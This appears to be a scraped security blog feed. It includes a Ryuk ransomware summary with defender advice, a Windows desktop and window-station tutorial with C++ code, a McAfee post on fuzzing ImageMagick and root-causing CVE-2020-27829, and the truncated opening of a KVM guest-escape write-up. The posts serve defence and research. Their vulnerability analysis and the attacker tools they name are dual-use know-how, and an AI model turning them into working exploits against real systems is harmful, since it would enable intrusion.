Malicious documents have been an entry point for most malware families and these attacks have been evolving their infection techniques and obfuscation, not just limiting to direct downloads of payload from VBA, but creating agents dynamically to download payload as we discussed in this blog. Usage of such agents in the infection chain is not only limited to Word or Excel, but further threats may use other living off the land tools to download its payloads.

Due to security concerns, macros are disabled by default in Microsoft Office applications. We suggest enabling them only when the document received is from a trusted source.

The post Zloader With a New Infection Technique appeared first on McAfee Blog.

New Ryuk Ransomware Sample Targets Webservers

7 July 2021 at 04:01

Executive Summary

Ryuk is a ransomware that encrypts a victim’s files and requests payment in Bitcoin cryptocurrency to release the keys used for encryption. Ryuk is used exclusively in targeted ransomware attacks.

Ryuk was first observed in August 2018 during a campaign that targeted several enterprises. Analysis of the initial versions of the ransomware revealed similarities and shared source code with the Hermes ransomware. Hermes ransomware is a commodity malware for sale on underground forums and has been used by multiple threat actors.

To encrypt files Ryuk utilizes a combination of symmetric AES (256-bit) encryption and asymmetric RSA (2048-bit or 4096-bit) encryption. The symmetric key is used to encrypt the file contents, while the asymmetric public key is used to encrypt the symmetric key. Upon payment of the ransom the corresponding asymmetric private key is released, allowing the encrypted files to be decrypted.

Because of the targeted nature of Ryuk infections, the initial infection vectors are tailored to the victim. Often seen initial vectors are spear-phishing emails, exploitation of compromised credentials to remote access systems and the use of previous commodity malware infections. As an example of the latter, the combination of Emotet and TrickBot, have frequently been observed in Ryuk attacks.

Coverage and Protection Advice

Ryuk is detected as Ransom-Ryuk![partial-hash].

Defenders should be on the lookout for traces and behaviours that correlate to open source pen test tools such as winPEAS, Lazagne, Bloodhound and Sharp Hound, or hacking frameworks like Cobalt Strike, Metasploit, Empire or Covenant, as well as abnormal behavior of non-malicious tools that have a dual use. These seemingly legitimate tools (e.g., ADfind, PSExec, PowerShell, etc.) can be used for things like enumeration and execution. Subsequently, be on the lookout for abnormal usage of Windows Management Instrumentation WMIC (T1047). We advise everyone to check out the following blogs on evidence indicators for a targeted ransomware attack (Part1, Part2).

Looking at other similar Ransomware-as-a-Service families, we have seen that certain entry vectors are quite common among ransomware criminals:
  • E-mail Spear phishing (T1566.001) often used to directly engage and/or gain an initial foothold. The initial phishing email can also be linked to a different malware strain, which acts as a loader and entry point for the attackers to continue completely compromising a victim’s network. We have observed this in the past with the likes of Trickbot & Ryuk or Qakbot & Prolock, etc.
  • Exploit Public-Facing Application (T1190) is another common entry vector, given cyber criminals are often avid consumers of security news and are always on the lookout for a good exploit. We therefore encourage organizations to be fast and diligent when it comes to applying patches. There are numerous examples in the past where vulnerabilities concerning remote access software, webservers, network edge equipment and firewalls have been used as an entry point.
  • Using valid accounts (T1078) is and has been a proven method for cybercriminals to gain a foothold. After all, why break the door down if you already have the keys? Weakly protected RDP access is a prime example of this entry method. For the best tips on RDP security, please see our blog explaining RDP security.
  • Valid accounts can also be obtained via commodity malware such as infostealers that are designed to steal credentials from a victim’s computer. Infostealer logs containing thousands of credentials can be purchased by ransomware criminals to search for VPN and corporate logins. For organizations, having a robust credential management and MFA on user accounts is an absolute must have.

When it comes to the actual ransomware binary, we strongly advise updating and upgrading endpoint protection, as well as enabling options like tamper protection and Rollback. Please read our blog on how to best configure ENS 10.7 to protect against ransomware for more details.

Summary of the Threat

Ryuk ransomware is used exclusively in targeted attacks

Latest sample now targets webservers

New ransom note prompts victims to install Tor browser to facilitate contact with the actors

After file encryption, the ransomware will print 50 copies of the ransom note on the default printer

Learn more about Ryuk ransomware, including Indicators of Compromise, Mitre ATT&CK techniques and Yara Rule, by reading our detailed technical analysis.

The post New Ryuk Ransomware Sample Targets Webservers appeared first on McAfee Blog.

Processes, Threads, and Windows

3 July 2021 at 12:19

The relationship between processes and threads is fairly well known – a process contains one or more threads, running within the process, using process wide resources, like handles and address space.

Where do windows (those usually-rectangular elements, not the OS) come into the picture?

The relationship between a process, its threads, and windows, along with desktop and Window Stations, can be summarized in the following figure:

A process, threads, windows, desktops and a Window Station

A window is created by a thread, and that thread is designated as the owner of the window. The creating thread becomes a UI thread (if it’s the first User/GDI call it makes), getting a message queue (provided internally by Win32k.sys in the kernel). Every occurrence in the created window causes a message to be placed in the message queue of the owner thread. This means that if a thread creates 100 windows, it’s responsible for all these windows.

“Responsible” here means that the thread must perform something known as “message pumping” – pulling messages from its message queue and processing them. Failure to do that processing would lead to the infamous “Not Responding” scenario, where all the windows created by that thread become non-responsive. Normally, a thread can read its own message queue only – other threads can’t do it for that thread – this is a single threaded UI scheme used by the Windows OS by default. The simplest message pump would look something like this:

MSG msg;
while(::GetMessage(&msg, nullptr, 0, 0)) {
    ::TranslateMessage(&msg);
    ::DispatchMessage(&msg);
}

The call to GetMessage does not return until there is a message in the queue (filling up the MSG structure), or the WM_QUIT message has been retrieved, causing GetMessage to return FALSE and the loop exited. WM_QUIT is the message typically used to signal an application to close. Here is the MSG structure definition:

typedef struct tagMSG {
  HWND   hwnd;
  UINT   message;
  WPARAM wParam;
  LPARAM lParam;
  DWORD  time;
  POINT  pt;
} MSG, *PMSG;

Once a message has been retrieved, the important call is to DispatchMessage, that looks at the window handle in the message (hwnd) and looks up the window class that this window instance is a member of, and there, finally, the window procedure – the callback to invoke for messages destined to these kinds of windows – is invoked, handling the message as appropriate or passing it along to default processing by calling DefWindowProc. (I may expand on that if there is interest in a separate post).
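For reference, a minimal window procedure might look something like this (a generic sketch, not tied to any particular window class):

LRESULT CALLBACK MyWindowProc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam) {
	switch (msg) {
		case WM_CLOSE:
			::DestroyWindow(hWnd);
			return 0;

		case WM_DESTROY:
			// post WM_QUIT so GetMessage returns FALSE and the message pump exits
			::PostQuitMessage(0);
			return 0;
	}
	// everything else goes to default processing
	return ::DefWindowProc(hWnd, msg, wParam, lParam);
}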

You can enumerate the windows owned by a thread by calling EnumThreadWindows. Let’s see an example that uses the Toolhelp API to enumerate all processes and threads in the system, and lists the windows created (owned) by each thread (if any).

We’ll start by creating a snapshot of all processes and threads (error handling mostly omitted for clarity):

#include <Windows.h>
#include <TlHelp32.h>
#include <unordered_map>
#include <string>

int main() {
	auto hSnapshot = ::CreateToolhelp32Snapshot(
        TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);

We’ll build a map of process IDs to names for easy lookup later on when we show details of a process:

PROCESSENTRY32 pe;
pe.dwSize = sizeof(pe);

// we can skip the idle process
::Process32First(hSnapshot, &pe);

std::unordered_map<DWORD, std::wstring> processes;
processes.reserve(500);

while (::Process32Next(hSnapshot, &pe)) {
	processes.insert({ pe.th32ProcessID, pe.szExeFile });
}

Now we loop through all the threads, calling EnumThreadWindows and showing the results:

THREADENTRY32 te;
te.dwSize = sizeof(te);
::Thread32First(hSnapshot, &te);

static int count = 0;

struct Data {
	DWORD Tid;
	DWORD Pid;
	PCWSTR Name;
};
do {
	if (te.th32OwnerProcessID <= 4) {
		// idle and system processes have no windows
		continue;
	}
	Data d{ 
        te.th32ThreadID, te.th32OwnerProcessID, 
        processes.at(te.th32OwnerProcessID).c_str() 
    };
	::EnumThreadWindows(te.th32ThreadID, [](auto hWnd, auto param) {
		count++;
		WCHAR text[128], className[32];
		auto data = reinterpret_cast<Data*>(param);
		int textLen = ::GetWindowText(hWnd, text, _countof(text));
		int classLen = ::GetClassName(hWnd, className, _countof(className));
		printf("TID: %6u PID: %6u (%ws) HWND: 0x%p [%ws] %ws\n",
			data->Tid, data->Pid, data->Name, hWnd,
			classLen == 0 ? L"" : className,
			textLen == 0 ? L"" : text);
		return TRUE;	// bring in the next window
		}, reinterpret_cast<LPARAM>(&d));
} while (::Thread32Next(hSnapshot, &te));
printf("Total windows: %d\n", count);

EnumThreadWindows requires the thread ID to look at, and a callback that receives a window handle and whatever was passed in as the last argument. Returning TRUE causes the callback to be invoked with the next window until the window list for that thread is complete. It’s possible to return FALSE to terminate the enumeration early.

I’m using a lambda function here, but only a non-capturing lambda can be converted to a C function pointer, so the param value is used to provide context for the lambda, with a Data instance having the thread ID, its process ID, and the process name.

The call to GetClassName returns the name of the window class, or type of window, if you will. This is similar to the relationship between objects and classes in object orientation. For example, all buttons have the class name “button”. Of course, the windows enumerated are only top level windows (have no parent) – child windows are not included. It is possible to enumerate child windows by calling EnumChildWindows.

Going the other way around – from a window handle to its owner thread and *its* owner process is possible with GetWindowThreadProcessId.

Desktops

A window is placed on a desktop, and is bound to it. More precisely, a thread is bound to a desktop once it creates its first window (or has any hook installed with SetWindowsHookEx). Before that happens, a thread can attach itself to a desktop by calling SetThreadDesktop.

Normally, a thread will use the “default” desktop, which is where a logged in user sees his or her windows appearing. It is possible to create additional desktops using the CreateDesktop API. A classic example is the desktops Sysinternals tool. See my post on desktops and windows stations for more information.

It’s possible to redirect a new process to use a different desktop (and optionally a window station) as part of the CreateProcess call. The STARTUPINFO structure has a member named lpDesktop that can be set to a string with the format “WindowStationName\DesktopName” or simply “DesktopName” to keep the parent’s window station. This could look something like this:

STARTUPINFO si = { sizeof(si) };
// WinSta0 is the interactive window station
WCHAR desktop[] = L"Winsta0\\MyOtherDesktop";
si.lpDesktop = desktop;
PROCESS_INFORMATION pi;
::CreateProcess(..., &si, &pi);

“WinSta0” is always the name of the interactive Window Station (one of its desktops can be visible to the user).

The following example creates 3 desktops and launches notepad in the default desktop and the other desktops:

void LaunchInDesktops() {
	HDESK hDesktop[4] = { ::GetThreadDesktop(::GetCurrentThreadId()) };
	for (int i = 1; i <= 3; i++) {
		hDesktop[i] = ::CreateDesktop(
			(L"Desktop" + std::to_wstring(i)).c_str(),
			nullptr, nullptr, 0, GENERIC_ALL, nullptr);
	}
	STARTUPINFO si = { sizeof(si) };
	WCHAR name[32];
	si.lpDesktop = name;
	DWORD len;
	PROCESS_INFORMATION pi;
	for (auto h : hDesktop) {
		::GetUserObjectInformation(h, UOI_NAME, name, sizeof(name), &len);
		WCHAR pname[] = L"notepad";
		if (::CreateProcess(nullptr, pname, nullptr, nullptr, FALSE,
			0, nullptr, nullptr, &si, &pi)) {
			printf("Process created: %u\n", pi.dwProcessId);
			::CloseHandle(pi.hProcess);
			::CloseHandle(pi.hThread);
		}
	}
}

If you run the above function, you’ll see one Notepad window on your desktop. If you dig deeper, you’ll find 4 notepad.exe processes in Task Manager. The other three have created their windows in different desktops. Task Manager gives no indication of that, nor does the process list in Process Explorer. However, we see a hint in the list of handles of these “other” notepad processes. Here is one:

Handle named \Desktop1

Curiously enough, desktop objects are not stored as part of the kernel’s Object Manager namespace. If you double-click the handle, copy its address, and look it up in the kernel debugger, this is the result:

lkd> !object 0xFFFFAC8C12035530
Object: ffffac8c12035530  Type: (ffffac8c0f2fdbc0) Desktop
    ObjectHeader: ffffac8c12035500 (new version)
    HandleCount: 1  PointerCount: 32701
    Directory Object: 00000000  Name: Desktop1

Notice the directory object address is zero – it’s not part of any directory. It has meaning in the context of its containing Window Station.

You might think that we can use the EnumThreadWindows as demonstrated at the beginning of this post to locate the other notepad windows. Unfortunately, access is restricted and those notepad windows are not listed (more on that possibly in a future post).

We can try a different approach by using yet another enumeration function – EnumDesktopWindows. Given a powerful enough desktop handle, we can enumerate all top level windows in that desktop:

void ListDesktopWindows(HDESK hDesktop) {
	::EnumDesktopWindows(hDesktop, [](auto hWnd, auto) {
		WCHAR text[128], className[32];
		int textLen = ::GetWindowText(hWnd, text, _countof(text));
		int classLen = ::GetClassName(hWnd, className, _countof(className));
		DWORD pid;
		auto tid = ::GetWindowThreadProcessId(hWnd, &pid);
		printf("TID: %6u PID: %6u HWND: 0x%p [%ws] %ws\n",
			tid, pid, hWnd, 
			classLen == 0 ? L"" : className,
			textLen == 0 ? L"" : text);
		return TRUE;
		}, 0);
}

The lambda body is very similar to the one we’ve seen earlier. The difference is that we start with a window handle with no thread ID. But it’s fairly easy to get the owner thread and process with GetWindowThreadProcessId. Here is one way to invoke this function:

auto hDesktop = ::OpenDesktop(L"Desktop1", 0, FALSE, DESKTOP_ENUMERATE);
ListDesktopWindows(hDesktop);

Here is the resulting output:

TID:   3716 PID:  23048 HWND: 0x0000000000192B26 [Touch Tooltip Window] Tooltip
TID:   3716 PID:  23048 HWND: 0x0000000001971B1A [UAC_InputIndicatorOverlayWnd]
TID:   3716 PID:  23048 HWND: 0x00000000002827F2 [UAC Input Indicator]
TID:   3716 PID:  23048 HWND: 0x0000000000142B82 [CiceroUIWndFrame] CiceroUIWndFrame
TID:   3716 PID:  23048 HWND: 0x0000000000032C7A [CiceroUIWndFrame] TF_FloatingLangBar_WndTitle
TID:  51360 PID:  23048 HWND: 0x0000000000032CD4 [Notepad] Untitled - Notepad
TID:   3716 PID:  23048 HWND: 0x0000000000032C8E [CicLoaderWndClass]
TID:  51360 PID:  23048 HWND: 0x0000000000202C62 [IME] Default IME
TID:  51360 PID:  23048 HWND: 0x0000000000032C96 [MSCTFIME UI] MSCTFIME UI

A Notepad window is clearly there. We can repeat the same exercise with the other two desktops, which I have named “Desktop2” and “Desktop3”.

Can we view and interact with these “other” notepads? The SwitchDesktop API exists for that purpose. Given a desktop handle with the DESKTOP_SWITCHDESKTOP access, SwitchDesktop changes the input desktop to the requested desktop, so that input devices redirect to that desktop. This is exactly how the Sysinternals Desktops tool works. I’ll leave the interested reader to try this out.
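As a starting point for such an experiment, a small sketch could look like the following (assuming the “Desktop1” desktop from the earlier example exists, and that we switch back to the default desktop after ten seconds):

void SwitchToDesktop1ForAWhile() {
	auto hDesktop = ::OpenDesktop(L"Desktop1", 0, FALSE, DESKTOP_SWITCHDESKTOP);
	auto hDefault = ::OpenDesktop(L"Default", 0, FALSE, DESKTOP_SWITCHDESKTOP);
	if (hDesktop && hDefault) {
		::SwitchDesktop(hDesktop);	// input devices now drive Desktop1
		::Sleep(10 * 1000);			// give us time to look around
		::SwitchDesktop(hDefault);	// back to the normal desktop
	}
	if (hDesktop) ::CloseDesktop(hDesktop);
	if (hDefault) ::CloseDesktop(hDefault);
}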

Window Stations

The last piece of the puzzle is a Window Station. I assume you’ve read my earlier post and understand the basics of Window Stations.

A thread can be associated with a desktop. A process is associated with a window station, with the constraint being that any desktop used by a thread must belong to the process’ window station. In other words, a process cannot be associated with one window station while any one of its threads uses a desktop that belongs to a different window station.

A process is associated with a window station upon creation – the one specified in the STARTUPINFO structure or the creator’s window station if not specified. Still, a process can associate itself with a different window station by calling SetProcessWindowStation. The constraint is that the provided window station must be part of the current session. There is one window station per session named “WinSta0”, called the interactive window station. One of its desktops can be the input desktop and have user interaction. All other window stations are non-interactive by definition, which is perfectly fine for processes that don’t require any user interface. In return, they get better isolation, because a window station contains its own set of desktops, its own clipboard and its own atom table. Window handles, by the way, have window station scope.

Just like desktops, window stations can be created by calling CreateWindowStation. Window stations can be enumerated as well (in the current session) with EnumWindowStations.
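Here is a small sketch combining both enumerations – listing the window stations in the current session and the desktops inside each one (same lambda style as the earlier examples):

void ListWindowStationsAndDesktops() {
	::EnumWindowStations([](auto name, auto) -> BOOL {
		printf("Window station: %ws\n", name);
		auto hWinSta = ::OpenWindowStation(name, FALSE, WINSTA_ENUMDESKTOPS);
		if (hWinSta) {
			::EnumDesktops(hWinSta, [](auto desktop, auto) -> BOOL {
				printf("  Desktop: %ws\n", desktop);
				return TRUE;	// next desktop
			}, 0);
			::CloseWindowStation(hWinSta);
		}
		return TRUE;	// next window station
	}, 0);
}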

Summary

This discussion of threads, processes, desktops, and window stations is not complete, but hopefully gives you a good idea of how things work. I may elaborate on some advanced aspects of Windows UI system in future posts.


zodiacon

Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829

30 June 2021 at 15:00

Introduction:

ImageMagick is a hugely popular open source software that is used in lot of systems around the world. It is available for the Windows, Linux, MacOS platforms as well as Android and iOS. It is used for editing, creating or converting various digital image formats and supports various formats like PNG, JPEG, WEBP, TIFF, HEIC and PDF, among others.

Google OSS Fuzz and other threat researchers have made ImageMagick the frequent focus of fuzzing, an extremely popular technique used by security researchers to discover potential zero-day vulnerabilities in open, as well as closed source software. This research has resulted in various vulnerability discoveries that must be addressed on a regular basis by its maintainers. Despite the efforts of many to expose such vulnerabilities, recent fuzzing research from McAfee has exposed new vulnerabilities involving processing of multiple image formats, in various open source and closed source software and libraries including ImageMagick and Windows GDI+.

Fuzzing ImageMagick:

Fuzzing open source libraries has been covered in a detailed blog “Vulnerability Discovery in Open Source Libraries Part 1: Tools of the Trade” last year. Fuzzing ImageMagick is very well documented, so we will be quickly covering the process in this blog post and will focus on the root cause analysis of the issue we have found.

Compiling ImageMagick with AFL:

ImageMagick has lot of configuration options which we can see by running following command:

$./configure --help

We can customize various parameters as per our needs. To compile and install ImageMagick with AFL for our case, we can use following commands:

$CC=afl-gcc CXX=afl-g++ CFLAGS="-ggdb -O0 -fsanitize=address,undefined -fno-omit-frame-pointer" LDFLAGS="-ggdb -fsanitize=address,undefined -fno-omit-frame-pointer" ./configure

$ make -j$(nproc)

$sudo make install

This will compile and install ImageMagick with AFL instrumentation. The binary we will be fuzzing is “magick”, also known as “magick tool”. It has various options, but we will be using its image conversion feature to convert our image from one format to another.

A simple command would include the following:

$ magick <input file> <output file>

This command will convert an input file to an output file format. We will be fuzzing this with AFL.

Collecting Corpus:

Before we start fuzzing, we need to have a good input corpus. One way of collecting corpus is to search on Google or GitHub. We can also use existing test corpus from various software. A good test corpus is available on the  AFL site here: https://lcamtuf.coredump.cx/afl/demo/

Minimizing Corpus:

Corpus collection is one thing, but we also need to minimize the corpus. The way AFL works is that it instruments each basic block so that it can trace the program's execution path. It maintains shared memory as a bitmap and uses an algorithm to check for new block hits. If a new block hit is found, it saves this information to the bitmap.
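Conceptually, the instrumentation AFL injects at every basic block behaves like the simplified sketch below (based on AFL's own documentation of its edge-coverage scheme; the real code is generated at compile time by afl-gcc/afl-clang):

#include <cstdint>

static uint8_t shared_bitmap[65536];   // shared-memory map AFL inspects after each run
static uint16_t prev_location;         // shifted ID of the previously executed block

// conceptually executed at the start of every instrumented basic block;
// cur_location is a random ID assigned to the block at compile time
void afl_maybe_log(uint16_t cur_location) {
    shared_bitmap[cur_location ^ prev_location]++;  // record the (prev, cur) edge
    prev_location = cur_location >> 1;              // shift so A->B differs from B->A
}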

Now it may be possible that more than one input file from the corpus triggers the same path; as we have collected sample files from various sources, we don't have any information on what paths they will trigger at runtime. If we use this corpus without removing such files, then we end up wasting time and CPU cycles. We need to avoid that.

Interestingly AFL offers a utility called “afl-cmin” which we can use to minimize our test corpus. This is a recommended thing to do before you start any fuzzing campaign. We can run this as follows:

$afl-cmin -i <input directory> -o <output directory> -- magick @@ /dev/null

This command will minimize the input corpus and will keep only those files which trigger unique paths.

Running Fuzzers:

After we have minimized corpus, we can start fuzzing. To fuzz we need to use following command:

$afl-fuzz -i <mincorpus directory> -o <output directory> -- magick @@ /dev/null

This will only run a single instance of AFL utilizing a single core. In case we have multicore processors, we can run multiple instances of AFL, with one Master and n number of Slaves. Where n is the available CPU cores.

To check available CPU cores, we can use this command:

$nproc

This will give us the number of CPU cores (depending on the system) as follows:

In this case there are eight cores. So, we can run one Master and up to seven Slaves.

To run master instances, we can use following command:

$afl-fuzz -M Master -i <mincorpus directory> -o <output directory> -- magick @@ /dev/null

We can run slave instances using following command:

$afl-fuzz -S Slave1 -i <mincorpus directory> -o <output directory> -- magick @@ /dev/null

$afl-fuzz -S Slave2 -i <mincorpus directory> -o <output directory> -- magick @@ /dev/null

The same can be done for each slave. We just need to use an argument -S and can use any name like slave1, slave2, etc.

Results:

Within a few hours of beginning this fuzzing campaign, we found one crash related to an out-of-bounds read in heap memory. We reported this issue to ImageMagick, and they were very prompt in fixing it with a patch the very next day. ImageMagick has released a new build with version 7.0.46 to fix this issue. This issue was assigned CVE-2020-27829.

Analyzing CVE-2020-27829:

On checking the POC file, we found that it was a TIFF file.

When we open this file with ImageMagick with following command:

$magick poc.tif /dev/null

As a result, we see a crash like below:

As is clear from the above log, the program was trying to read 1 byte past the allocated heap buffer and therefore ASAN caused this crash. This can, at the very least, lead to an ImageMagick crash on systems running a vulnerable version of ImageMagick.

Understanding TIFF file format:

Before we start debugging this issue to find a root cause, it is necessary to understand the TIFF file format. Its specification is very well described here: http://paulbourke.net/dataformats/tiff/tiff_summary.pdf.

In short, a TIFF file has three parts:

  1. Image File Header (IFH) – Contains information such as file identifier, version, offset of IFD.
  2. Image File Directory (IFD) – Contains information on the height, width, and depth of the image, the number of colour planes, etc. It also contains various TAGs like colormap, page number, BitPerSample, FillOrder,
  3. Bitmap data – Contains various image data like strips, tiles, etc.

We can use the tiffinfo utility from libtiff to gather various information about the POC file. This allows us to see details like the width, height, samples per pixel, rows per strip, etc.:

There are a few things to note here:

TIFF Dir offset is: 0xa0

Image width is: 3 and length is: 32

Bits per sample is: 9

Sample per pixel is: 3

Rows per strip is: 1024

Planer configuration is: single image plane.

We will be using this data moving forward in this post.

Debugging the issue:

As we can see in the crash log, program was crashing at function “PushQuantumPixel” in the following location in quantum-import.c line 256:

On checking “PushQuantumPixel” function in “MagickCore/quantum-import.c” we can see the following code at line #256 where program is crashing:

We can see following:

  • “pixels” seems to be a character array
  • inside a for loop its value is being read and it is being assigned to quantum_info->state.pixel
  • its address is increased by one in each loop iteration

The program is crashing at this location while reading the value of “pixels” which means that value is out of bound from the allocated heap memory.

Now we need to figure out following:

  1. What is “pixels” and what data it contains?
  2. Why it is crashing?
  3. How this was fixed?

Finding root cause:

To start with, we can check the “ReadTIFFImage” function in the coders/tiff.c file and see that it allocates memory using an “AcquireQuantumMemory” function call, which is described in the documentation here:

https://imagemagick.org/api/memory.php:

“Returns a pointer to a block of memory at least count * quantum bytes suitably aligned for any use.

The format of the “AcquireQuantumMemory” method is:

void *AcquireQuantumMemory(const size_t count,const size_t quantum)

A description of each parameter follows:

count

the number of objects to allocate contiguously.

quantum

the size (in bytes) of each object. “

In this case two parameters passed to this function are “extent” and “sizeof(*strip_pixels)”

We can see that “extent” is calculated as following in the code below:

There is a function TIFFStripSize(tiff) which returns size for a strip of data as mentioned in libtiff documentation here:

http://www.libtiff.org/man/TIFFstrip.3t.html

In our case, it returns 224, and we can also see in the code mentioned above that “image->columns * sizeof(uint64)” is added as well, which adds 24 bytes, so the extent value becomes 248.

So this extent value of 248 and sizeof(*strip_pixels), which is 1, are passed to the “AcquireQuantumMemory” function, and a total of 248 bytes gets allocated.

This is how memory is allocated.

“strip_pixels” is a pointer to the newly allocated memory.

Note that this is 248 bytes of newly allocated memory. Since we are using ASAN, each byte will contain “0xbe”, the default fill value ASAN uses for newly allocated memory:

https://github.com/llvm-mirror/compiler-rt/blob/master/lib/asan/asan_flags.inc

The memory start location is 0x6110000002c0 and the end location is 0x6110000003b7, which is 248 bytes total.

This memory is set to 0 by a “memset” call and assigned to a variable “p”, as shown in the image below. Note that “p” will be used as a pointer to traverse this memory going forward in the program:

Later on, we see that there is a call to “TIFFReadEncodedPixels” which reads strip data from the TIFF file and stores it into the newly allocated 248-byte buffer “strip_pixels” (documentation here: http://www.libtiff.org/man/TIFFReadEncodedStrip.3t.html):

To understand what this TIFF file data is, we again need to refer to the TIFF file structure. We can see that there is a tag called “StripOffsets” whose value is 8, which specifies the offset of the strip data inside the TIFF file:

We see the following when we check data at offset 8 in the TIFF file:

We see the following when we print the data in “strip_pixels” (note that it is in little endian format):

So “strip_pixels” is the actual data from the TIFF file from offset 8. This will be traversed through pointer “p”.

Inside the “ReadTIFFImage” function there are two nested for loops.

  • The first “for loop” is responsible for iterating “samples_per_pixel” times, which is 3.
  • The second “for loop” is responsible for iterating over the pixel data “image->rows” times, which is 32. This second loop will be executed 32 times (the number of rows in the image) irrespective of the allocated buffer size.
  • Inside this second for loop, we can see something like this:

  • We can notice that the “ImportQuantumPixel” function uses the “p” pointer to read the data from “strip_pixels”, and after each call to “ImportQuantumPixel” the value of “p” is increased by “stride”.

Here “stride” is calculated by calling the “TIFFVStripSize()” function, which per the documentation returns the number of bytes in a strip with nrows rows of data. In this case it is 14. So the pointer “p” is incremented by 14 (0xE) on every iteration of the second for loop.

If we print the image structure which is passed to the “ImportQuantumPixels” function as a parameter, we can see the following:

Here we can notice that the columns value is 3, the rows value is 32 and the depth is 9. If we check the POC TIFF file, these come from the ImageWidth, ImageLength and BitsPerSample values:

Ultimately, control reaches “ImportRGBQuantum” and then the “PushQuantumPixel” function, and one of the arguments to this function is the pixel data pointed to by “p”. Remember that this points to the memory which was previously allocated using the “AcquireQuantumMemory” function, that its length is 248 bytes, and that the value of “p” is increased by 14 each time.

The “PushQuantumPixel” function is used to read pixel data from “p” into ImageMagick’s internal pixel data storage. There is a for loop which is responsible for reading data from the provided 248-byte pixels array into the “quantum_info” structure. This loop reads data from pixels incrementally and saves it in the “quantum_info->state.pixel” field.

The root cause here is that there are no proper bounds checks and the program tries to read data beyond the allocated buffer size on the heap, while reading the strip data inside a for loop.

This causes a crash in ImageMagick as we can see below:

Root cause

Therefore, to summarize, the program crashes because:

  1. The program allocates 248 bytes of memory to process the strip data for the image; a pointer “p” points to this memory.
  2. Inside a for loop, this pointer is increased by 14 (0xE) for each row of the image, of which there are 32 in this case.
  3. Based on this calculation, 32*14 = 448 bytes or more of memory would be required, but only 248 bytes were actually allocated.
  4. The program reads data as if the buffer were 448+ bytes, but only 248 bytes are available, causing an out-of-bounds memory read (a minimal sketch of this arithmetic follows this list).
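
To recap the arithmetic with a small, self-contained sketch (the numbers are the ones derived above for this specific POC, not general values):

#include <cstddef>
#include <cstdint>
#include <cstdio>

int main() {
    size_t strip_size = 224;                   // TIFFStripSize(tiff)
    size_t columns = 3, rows = 32;             // ImageWidth / ImageLength from the IFD
    size_t stride = 14;                        // per-row step returned by TIFFVStripSize()
    size_t extent = strip_size + columns * sizeof(uint64_t);  // 224 + 24 = 248 bytes allocated
    size_t walked = rows * stride;                            // 32 * 14  = 448 bytes traversed
    std::printf("allocated=%zu, traversed=%zu, out of bounds by %zu bytes\n",
                extent, walked, walked - extent);
    return 0;
}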

How was it fixed?

If we check the patch diff, we can see that the following changes were made to fix this issue:

Here the second argument to “AcquireQuantumMemory” is multiplied by 2, increasing the total amount of memory and preventing this out-of-bounds read from heap memory. The total memory allocated is now 248*2 = 496 bytes, as we can see below:

Another issue with the fix:

A new version, ImageMagick 7.0.46, was released to fix this issue. While the patch fixes the memory allocation issue, if we check the code below we can see that the memset call didn’t zero the proper amount of memory.

Memory was allocated as extent*2*sizeof(*strip_pixels), but the memset to 0 was only done for extent*sizeof(*strip_pixels). This means only half of the memory was set to 0, and the rest contained 0xbebebebe, ASAN’s default fill for newly allocated memory.
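
The mismatch is easy to model in isolation (extent == 248 as derived above; this is a stand-in, not the ImageMagick code):

#include <cstdlib>
#include <cstring>

int main() {
    const size_t extent = 248;
    // extent * 2 * sizeof(*strip_pixels) bytes are allocated ...
    unsigned char *strip_pixels = static_cast<unsigned char *>(std::malloc(extent * 2));
    if (strip_pixels == nullptr)
        return 1;
    // ... but only extent * sizeof(*strip_pixels) bytes are cleared, so bytes
    // [extent, 2*extent) keep whatever the allocator left there
    std::memset(strip_pixels, 0, extent);
    std::free(strip_pixels);
    return 0;
}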

This has since been fixed in subsequent releases of ImageMagick by using extent=2*TIFFStripSize(tiff); in the following patch:

https://github.com/ImageMagick/ImageMagick/commit/a5b64ccc422615264287028fe6bea8a131043b59#diff-0a5eef63b187504ff513056aa8fd6a7f5c1f57b6d2577a75cff428c0c7530978

Conclusion:

Processing image files requires a deep understanding of various file formats, so it is possible that some detail is implemented incorrectly or missed entirely. This can lead to vulnerabilities in such image processing software. Some of these vulnerabilities can lead to DoS, and some can lead to remote code execution affecting every installation of such popular software.

Fuzzing plays an important role in finding vulnerabilities often missed by developers and during testing. We at McAfee constantly fuzz various closed source as well as open source software to help secure it. We work very closely with vendors and follow responsible disclosure. This reflects McAfee’s commitment to securing software and protecting our customers from various threats.

We will continue to fuzz various software and work with vendors to help mitigate the risk arising from such threats.

We would like to thank the ImageMagick team for quickly resolving this issue within 24 hours and releasing a new version to fix it.

The post Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829 appeared first on McAfee Blog.

An EPYC escape: Case-study of a KVM breakout

By: Ryan
29 June 2021 at 15:58

Posted by Felix Wilhelm, Project Zero

Introduction

KVM (for Kernel-based Virtual Machine) is the de-facto standard hypervisor for Linux-based cloud environments. Outside of Azure, almost all large-scale cloud and hosting providers are running on top of KVM, turning it into one of the fundamental security boundaries in the cloud.

In this blog post I describe a vulnerability in KVM’s AMD-specific code and discuss how this bug can be turned into a full virtual machine escape. To the best of my knowledge, this is the first public writeup of a KVM guest-to-host breakout that does not rely on bugs in user space components such as QEMU. The discussed bug was assigned CVE-2021-29657, affects kernel versions v5.10-rc1 to v5.12-rc6 and was patched at the end of March 2021. As the bug only became exploitable in v5.10 and was discovered roughly 5 months later, most real world deployments of KVM should not be affected. I still think the issue is an interesting case study in the work required to build a stable guest-to-host escape against KVM and hope that this writeup can strengthen the case that hypervisor compromises are not only theoretical issues.

I start with a short overview of KVM’s architecture, before diving into the bug and its exploitation.

KVM

KVM is a Linux based open source hypervisor supporting hardware accelerated virtualization on x86, ARM, PowerPC and S/390. In contrast to the other big open source hypervisor Xen, KVM is deeply integrated with the Linux Kernel and builds on its scheduling, memory management and hardware integrations to provide efficient virtualization.

KVM is implemented as one or more kernel modules (kvm.ko plus kvm-intel.ko or kvm-amd.ko on x86) that expose a low-level IOCTL-based API to user space processes over the /dev/kvm device. Using this API, a user space process (often called VMM for Virtual Machine Manager) can create new VMs, assign vCPUs and memory, and intercept memory or IO accesses to provide access to emulated or virtualization-aware hardware devices. QEMU has been the standard user space choice for KVM-based virtualization for a long time, but in the last few years alternatives like LKVM, crosvm or Firecracker have started to become popular.

While KVM’s reliance on a separate user space component might seem complicated at first, it has a very nice benefit: Each VM running on a KVM host has a 1:1 mapping to a Linux process, making it manageable using standard Linux tools.

